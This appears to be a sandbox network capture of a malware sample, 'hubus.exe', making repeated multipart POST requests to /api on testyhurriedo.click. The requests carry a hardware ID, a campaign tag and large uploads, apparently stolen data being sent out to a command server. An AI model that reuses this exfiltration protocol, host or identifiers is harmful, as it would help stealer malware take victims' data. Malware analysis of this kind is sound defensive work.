2024-12-19 23:58:35 UTC | 5454 | OUT | Data Raw: ed c4 56 d7 d8 75 7b 47 d2 68 31 1f f5 ce c4 26 80 58 00 9f 02 e2 d7 5d ef da 68 c4 65 f3 02 1a 5d e3 17 54 a9 ba eb 91 5a 95 6d a3 b1 48 ab ef e3 44 b6 cc 50 39 d2 80 18 d8 28 05 de d2 29 a7 23 a3 fd 62 e0 d2 60 f3 9c de 50 85 b6 cd a9 74 4c d8 cc 07 59 7e 6f 0c f9 6f 38 01 50 1f e0 d4 37 c7 23 5d 66 24 ce ee e1 f7 f9 c0 8d 8f a2 96 74 b9 a0 9b bc 33 c5 0f 18 ae 1a d3 37 38 e4 b5 bb 46 d8 95 3d 17 6f 0d a8 d5 98 dd 3e c6 65 f9 ed 6c 0e 6b 59 60 ab 33 1a 26 4e 75 6d ba d1 05 38 57 6f f9 d9 68 fa 51 96 5e b3 35 47 37 a9 e3 b0 8e 66 f6 1c 65 f9 69 8c b3 d9 1e 97 75 47 2b b9 79 5a f4 06 d5 35 56 b0 1a 03 eb 65 b2 76 8e 96 58 2b 9d d3 0a e3 aa 65 b3 6e 84 d7 68 9f d0 72 c9 78 92 f5 e5 d9 68 37 aa 14 e2 6c c6 33 a3 c8 19 d6 fb 93 15 36 ff a0 64 53 05 9a ce 24
                                                                                                                                                                                                                                                            Data Ascii: Vu{Gh1&X]he]TZmHDP9()#b`PtLY~oo8P7#]f$t378F=o>elkY`3&Num8WohQ^5G7feiuG+yZ5VevX+enhrxh7l36dS$
2024-12-19 23:58:36 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:35 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bcd5m49a4jhbg8pl57v96bh5e7; expires=Mon, 14 Apr 2025 17:45:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6MLKwto3NUJ7W5piMvGx3QNxHE6gFPR4dRrieiM91K47L3hgK85GjTPRgskcqwIXR9j90gwyBZRfp4adnNYVFvEGkO%2F3digVfdjnMXmAdFL0nEjLBBBDgjwU%2BDhoqRf9EkvuTmh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b576e596b32ef-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135088&min_rtt=134951&rtt_var=28676&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21740&delivery_rate=28297&cwnd=252&unsent_bytes=0&cid=7a33d2be4444e3bb&ts=874&x=0"
2024-12-19 23:58:36 UTC | 24 | IN | Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
2024-12-19 23:58:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49762 | 104.21.112.1 | 443 | 4780 | C:\Users\user\Desktop\hubus.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:36 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=276ZBBOBB0UYY
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 10909
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
2024-12-19 23:58:36 UTC | 10909 | OUT | Data Raw: 2d 2d 32 37 36 5a 42 42 4f 42 42 30 55 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 32 37 36 5a 42 42 4f 42 42 30 55 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 37 36 5a 42 42 4f 42 42 30 55 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 32 37 36 5a 42 42 4f 42 42 30
                                                                                                                                                                                                                                                            Data Ascii: --276ZBBOBB0UYYContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--276ZBBOBB0UYYContent-Disposition: form-data; name="pid"2--276ZBBOBB0UYYContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--276ZBBOBB0
2024-12-19 23:58:36 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:36 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5notlv8bgo6j6340ocajkgku49; expires=Mon, 14 Apr 2025 17:45:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O96By%2B1dKBDDLeMrFool0ycO3zmwqeQhuM0aDvj8l49D16UK1RNlknhf0Bow%2BLp%2BnlqXYcB0AL9Hvvs1zXo22jW0rdA%2B%2Bn6hWV87moEUorRFa4d2BvzhjF%2BSMwQczqOUOmfZvzlw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b57759b2332ef-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135430&min_rtt=135359&rtt_var=28623&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2849&recv_bytes=11847&delivery_rate=28252&cwnd=252&unsent_bytes=0&cid=7f598cd5ec40e8f6&ts=641&x=0"
2024-12-19 23:58:36 UTC | 24 | IN | Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
2024-12-19 23:58:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49763 | 104.21.112.1 | 443 | 4780 | C:\Users\user\Desktop\hubus.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:37 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1ZYKC004NNJH2LY1J1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20568
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:37 UTC15331OUTData Raw: 2d 2d 31 5a 59 4b 43 30 30 34 4e 4e 4a 48 32 4c 59 31 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 31 5a 59 4b 43 30 30 34 4e 4e 4a 48 32 4c 59 31 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 5a 59 4b 43 30 30 34 4e 4e 4a 48 32 4c 59 31 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c
                                                                                                                                                                                                                                                            Data Ascii: --1ZYKC004NNJH2LY1J1Content-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--1ZYKC004NNJH2LY1J1Content-Disposition: form-data; name="pid"3--1ZYKC004NNJH2LY1J1Content-Disposition: form-data; name="lid"jMw1IE--SHELL
                                                                                                                                                                                                                                                            2024-12-19 23:58:37 UTC5237OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 4d d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: Mazw\ot^:):Ln`X6Eusazw
2024-12-19 23:58:37 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=otntc6rbhmandecob91kness75; expires=Mon, 14 Apr 2025 17:45:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0QiLvwsCKZ%2BjPzSEIh2B3TrVkF7QUSnpiRlpVTV5jhScL2BQCNy2XEvaq0M95oaSY8fG1YQKpSVdy%2BbozMqns%2BW9kuDhY960PKMBuhRxwPW47vpkMn%2FccJyXERQAY983rXkkXZN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b577bba1832e1-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135231&min_rtt=135109&rtt_var=28703&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21533&delivery_rate=28244&cwnd=252&unsent_bytes=0&cid=051d03c38d7cb8fc&ts=608&x=0"
2024-12-19 23:58:37 UTC | 24 | IN | Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
2024-12-19 23:58:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49764 | 104.21.112.1 | 443 | 4780 | C:\Users\user\Desktop\hubus.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:38 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=183MKCYFFJLTGU3A
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1264
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:38 UTC1264OUTData Raw: 2d 2d 31 38 33 4d 4b 43 59 46 46 4a 4c 54 47 55 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 31 38 33 4d 4b 43 59 46 46 4a 4c 54 47 55 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 38 33 4d 4b 43 59 46 46 4a 4c 54 47 55 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 31
                                                                                                                                                                                                                                                            Data Ascii: --183MKCYFFJLTGU3AContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--183MKCYFFJLTGU3AContent-Disposition: form-data; name="pid"1--183MKCYFFJLTGU3AContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--1
2024-12-19 23:58:38 UTC | 1136 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=h6o5tuksg6tkoh9k02eprtmc3m; expires=Mon, 14 Apr 2025 17:45:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kLvOk10sg2f9NV1L%2B4hxTs8%2BkcoOr1Bz%2B25lmHarpYmXlRdGKy9PomoXsdazCI20ldlMn9ycJJf5BD%2FCEtii7vdUVjCgGeVdSSQmc3%2FGDobPWiYJz1XbkhDcrA%2BcrI9ivQjrSnJL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b5781bbc132f8-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=134972&min_rtt=134674&rtt_var=28555&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2182&delivery_rate=28391&cwnd=252&unsent_bytes=0&cid=75017b62af6dc914&ts=543&x=0"
2024-12-19 23:58:38 UTC | 24 | IN | Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
2024-12-19 23:58:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49765 | 104.21.112.1 | 443 | 4780 | C:\Users\user\Desktop\hubus.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:39 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=0U6W4TDPD
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1066431
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 2d 2d 30 55 36 57 34 54 44 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 30 55 36 57 34 54 44 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 55 36 57 34 54 44 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 30 55 36 57 34 54 44 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                                                                                                                                            Data Ascii: --0U6W4TDPDContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--0U6W4TDPDContent-Disposition: form-data; name="pid"1--0U6W4TDPDContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--0U6W4TDPDContent-Dis
                                                                                                                                                                                                                                                            Data Ascii: !R)v5AwVLwX{O9a:roXt![^QfA7ursn#EPm^F**j"%*L-BHnOq#_c5_RS[E_\_hN]xL0O]0G;BK
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 45 ee 20 60 33 b9 5d f1 bf 2d 3b b5 00 2b 65 f9 bc 51 92 9a 26 0f 01 70 61 ad 0d b7 e7 eb 66 ba f6 c5 84 37 2d bf 6c 9e 72 d8 17 28 88 e5 bf ac 68 1c 4e d0 6a 4c 70 86 4b 8e 1b dd 4f b5 69 24 b6 a0 b9 fa ee 56 f3 b9 3f be 66 2a 68 04 00 4d 51 62 00 53 6d 8b 8b 39 fb 5f 03 25 10 88 25 5b 10 76 80 4f c7 fc d1 2d 21 09 08 89 63 6e 4b ea bd 00 61 87 35 30 b6 8f 8a 7f 03 09 1d 85 59 95 2a d7 5d 28 18 17 b9 4b 10 96 cc 99 06 28 63 48 a8 6c c2 0e 31 40 9c 4e 83 b6 c5 fd d9 8d fb b5 6a fc 1f 95 4f 86 43 20 ae 5f 3e 1d 0e 45 10 2e b5 4d a8 01 91 bd bd 84 6b 74 d8 62 e1 01 15 09 f2 9f dd 71 f2 66 96 89 46 d2 0d 75 f1 ea 51 c3 e6 91 1e ec a0 36 a4 06 35 4e 9f 99 dd ed 08 a2 06 c9 37 81 65 95 3b 69 a9 b8 6d 3f 09 b2 23 33 b9 c6 32 23 24 53 19 92 c3 af 15 a7 22 48 0d
                                                                                                                                                                                                                                                            Data Ascii: E `3]-;+eQ&paf7-lr(hNjLpKOi$V?f*hMQbSm9_%%[vO-!cnKa50Y*](K(cHl1@NjOC _>E.MktbqfFuQ65N7e;im?#32#$S"H
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 4d a6 fe ae 8d 43 92 67 86 43 c9 a6 8f 55 18 06 98 33 a7 43 d8 e3 ad ac 5c 33 16 47 ce b9 21 1e 52 e7 e5 89 85 47 e2 a4 8b 76 71 8f 55 1c 78 fd 30 81 ee 53 36 ef 22 61 48 30 15 25 ec 94 f3 d1 34 bc 98 f1 96 aa 62 06 ce 59 b7 e5 fe 9f 85 37 30 c0 46 1a c2 8f 0f f8 33 c1 04 4c 6e 46 55 47 a8 cc 64 2f 05 95 a6 7b 34 7c dd 13 43 15 20 f5 80 6b d0 3a 0a f6 c0 20 b6 ce 7f b6 e9 ee 83 d2 ba db 6d c0 44 28 24 32 98 29 be 2b f2 81 19 9a 24 7a f5 10 ca b4 48 8c 69 66 46 fe 1f 48 fb 28 1c b0 ea de bf f1 9b 04 75 89 96 25 41 50 25 bd 8e 26 ac fe 80 fe e7 50 e7 7d 9e e0 7f 4a 65 6f b6 88 fa 21 9e f5 91 42 27 70 62 f4 94 08 db 31 90 33 0d 54 08 a1 f1 b3 6b 20 3b 7f fb c9 1b f5 8d 21 d2 e1 dc 08 4e 80 f0 8f ca 6e 58 17 c2 a9 e7 24 40 40 c9 ad ed c3 c9 30 83 46 a9 9d f3
                                                                                                                                                                                                                                                            Data Ascii: MCgCU3C\3G!RGvqUx0S6"aH0%4bY70F3LnFUGd/{4|C k: mD($2)+$zHifFH(u%AP%&P}Jeo!B'pb13Tk ;!NnX$@@0F
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 67 20 1e 26 85 33 b8 06 9e 00 cf 76 23 4f f2 f9 c6 c0 a6 43 d2 f2 48 f2 00 98 b1 f9 46 12 ab 0d 01 92 af 1e 06 84 62 88 02 4e e0 09 62 48 a2 b1 e0 26 ac 80 b3 88 88 19 b3 de 98 50 4e b6 73 99 9a 47 c8 c8 81 0d 9c 01 bb 6d 3c d2 6a a7 f9 ff cb 9d 4f 29 e1 b9 25 72 f8 cc d7 ab 52 ad 9f 3f b3 e6 55 3c 41 69 99 94 c4 d8 e7 ae 9a bb 12 ce 2d 2d 1c 72 2b f9 d0 68 bb 16 f7 0a d4 c6 3a 22 d1 29 95 6a ff f3 93 81 6c 1d 97 51 20 b6 2c 91 2c 02 e3 44 0e f8 ff 8a 22 fa db d7 b6 76 88 56 09 ea 9a 94 8f 09 d5 d2 ea 49 ea 7c b5 db 4d 72 59 e5 ae 9e 31 00 3c 69 61 d1 10 58 a2 68 f2 59 30 08 49 7d 25 09 39 d2 16 20 92 20 78 1b af 32 96 d9 e2 c3 1a 9d 72 79 5a 8c d9 d8 02 51 64 4c eb 0b bb 1e 60 dc aa 04 1c 5b 07 87 c6 a4 05 7e 8f 26 6b 1e 18 d8 5d 09 ab af 4f fd 7d 0a 22
                                                                                                                                                                                                                                                            Data Ascii: g &3v#OCHFbNbH&PNsGm<jO)%rR?U<Ai--r+h:")jlQ ,,D"vVI|MrY1<iaXhY0I}%9 x2ryZQdL`[~&k]O}"
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 87 14 0c ef 2d 6d 90 d9 b0 a3 fe 72 09 bb 6f b6 cb 45 d0 51 8c 14 40 f2 40 64 ab 08 83 25 f4 43 ea 71 13 41 cf 6e 1a 13 4c 8f 70 cc a3 d6 06 3b e0 1e 73 c1 4e 53 86 33 a3 7f e3 06 9b e8 34 b3 00 44 ab db 98 6c 78 3a 79 75 5c 53 66 ef f1 e8 31 67 55 05 63 1a 4a ee 32 66 0d 7c 19 5f d7 b1 0f 76 6d 49 78 99 19 b7 33 05 f1 c4 fc 2e b5 5b d5 1c 91 fa 33 92 52 51 d3 fb ea 7c 2c 7b e9 de 8b 3c 94 06 3c 2c b8 f6 bb 1a ae e8 6c ca 70 dc c8 03 52 e7 75 73 4f f6 69 16 a7 ff 39 ec fe f3 92 3a dd ef eb 99 5d 31 47 a1 e1 d9 89 97 95 62 4d c4 97 4a 9c 5b 1d e2 4f c7 f0 46 ba 48 e8 b5 20 7c 82 1d ba 6e 4f 72 c7 16 b1 e2 c4 c6 a7 37 b0 1f 50 d3 96 05 f1 1f 6e 55 3c 0d 46 68 95 39 fa b6 bd d1 13 e6 7d 26 13 39 68 17 02 aa b9 db db 77 a2 7b 49 cf ed e2 4a 8b d3 81 e1 06 d9
                                                                                                                                                                                                                                                            Data Ascii: -mroEQ@@d%CqAnLp;sNS34Dlx:yu\Sf1gUcJ2f|_vmIx3.[3RQ|,{<<,lpRusOi9:]1GbMJ[OFH |nOr7PnU<Fh9}&9hw{IJ
2024-12-19 23:58:42 UTC  1144  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=uha6ljah1b06j1sre0u2h1nbgf; expires=Mon, 14 Apr 2025 17:45:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
